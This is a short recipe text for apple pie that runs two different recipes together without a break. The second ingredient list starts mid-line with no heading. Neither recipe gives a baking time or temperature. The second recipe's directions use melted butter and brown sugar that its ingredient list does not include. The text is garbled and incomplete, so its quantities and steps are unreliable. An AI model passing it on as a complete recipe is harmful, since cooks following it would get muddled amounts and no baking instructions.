INGREDIENTS:

5 lg. green apples
1 c. sugar
1/3 c. flour
1/4 tsp. salt
1 tsp. cinnamon
1/4 tsp. nutmeg
1 stick butter
2 (9 inch) pie shells, unbaked

DIRECTIONS:

Peel and cut apples into thick slices. Then put apples into pie shell. Mix all other ingredients together. Cut up butter until it becomes crumbly. Spoon the spice mixture over the apples then put on the second pie shell on top of pie. Sprinkle 3 tablespoons of sugar and 2 tablespoons butter on top of pie. 7 tart cooking apples
3/4 c. sugar
1/2 tsp. cinnamon
1/2 c. butter
3/4 c. flour

DIRECTIONS:

Melt 1/4 cup butter in saucepan. Toss sliced apples in it until well coated. Combine 3/4 cup sugar and 1/2 teaspoon cinnamon and pour over apples. Toss lightly. Put in unbaked pie shell. Combine 1/2 cup butter, flour, 1/2 teaspoon cinnamon and brown sugar and blend until crumbly.
